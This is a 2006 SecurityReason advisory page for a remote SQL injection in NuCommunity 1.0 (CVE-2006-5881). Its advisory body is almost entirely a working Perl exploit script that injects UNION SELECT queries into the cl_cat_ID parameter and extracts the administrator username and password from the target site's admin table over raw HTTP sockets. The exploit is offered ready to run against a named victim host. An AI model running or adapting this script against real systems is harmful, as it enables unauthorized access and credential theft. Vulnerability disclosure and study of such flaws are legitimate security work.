SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

NuCommunity 1.0 (cl_CatListing.asp) Remote SQL Injection Exploit


Arrow  SecurityAlert : 1853
Arrow  CVE : CVE-2006-5881
Arrow  SecurityRisk : Medium  Security Risk Medium  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Exploit Available : Yes
Arrow  Credit : ajann
Arrow  Published : 15.11.2006

Arrow  Affected Software : NuCommunity 1.0



Arrow  Advisory Content :  

From:Filistin,Lubnan,IraQ,Turkey
#!/usr/bin/perl
#[Script Name: NuCommunity 1.0 (cl_CatListing.asp) Remote SQL Injection
Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(

use IO::Socket;
if(@ARGV < 3){
print "
[=======================================================================
=
[// NuCommunity 1.0 (cl_CatListing.asp) Remote SQL Injection Exploit
[// Usage: exploit.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann
[=======================================================================
=
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http://)//eg;
$host = "http://".$server;
$port = "80";
$dir = $ARGV[1];
$file = "cl_CatListing.asp?cl_cat_ID=";
$target =
"-1%20union%20select%200,0,0,admin_user%20from%20admin+where+admin_id%20
like%20".$ARGV[2];
$target = $host.$dir.$file.$target;

$targettwo =
"-1%20union%20select%200,0,0,admin_password%20from%20admin+where+admin_i
d%20like%20".$ARGV[2];
$targettwo = $host.$dir.$file.$targettwo;

#Writing data to socket
print
"+**********************************************************************
+n";
print "+ Trying to connect: $servern";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server",
PeerPort => "$port") || die "n+ Connection failed...n";
print $socket "GET $targetn";
print $socket "Host: $servern";
print $socket "Accept: */*n";
print $socket "Connection: closenn";
print "+ Connected!...n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /t size="2">(.*?)</font>/){
print "+ Exploit succeed! Getting admin information.n";
print "+ ---------------- +n";
print "+ Username: $1n";

print
"+**********************************************************************
+n";
print "+ Trying to connect for Password: $servern";
$socket1 = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server",
PeerPort => "$port") || die "n+ Connection failed...n";
print $socket1 "GET $targettwon";
print $socket1 "Host: $servern";
print $socket1 "Accept: */*n";
print $socket1 "Connection: closenn";
print "+ Connected!...n";
#Getting
while($answer = <$socket1>) {
if ($answer =~ /t size="2">(.*?)</font>/){
print "+ Exploit succeed! Getting admin information.n";
print "+ ---------------- +n";
print "+ Password: $1n";
print
"+**********************************************************************
+n";
exit();
}

if ($answer =~ /Ad removed or not yet approved/) {
print "+ Exploit Failed : ( n";
print
"+**********************************************************************
+n";
exit();
}

if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( n";
print
"+**********************************************************************
+n";
exit();
}
}
}
}
print "+ Exploit failed :(n";
print
"+**********************************************************************
+n";





Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc:fts_*() Multiple Denial of Service

Security Risk Medium- 2009-10-02

The fts functions are provided for traversing UNIX file hierarchies...

Apache RSS Apache Alert

» Apache 1.3.41 mod_proxy
   Integer overflow (code
   execution)

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion in work
   directory

» Apache Tomcat 6.0.20 and
   5.5.28 insecure partial
   deploy after failed
   undeploy

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion and/or
   alteration

PHP RSS PHP Alert

» PHP 5.2.12/5.3.1
   session.save_path
   safe_mode and
   open_basedir bypass

» PHP 5.2.12/5.3.1 Multiple
   Vulnerabilities

» PHP 5.2.11 libgd multiple
   vulnerabilities

» PHP 5.2.11 tempnam()
   safe_mode bypass

Copyright © SecurityReason.com. All Rights Reserved.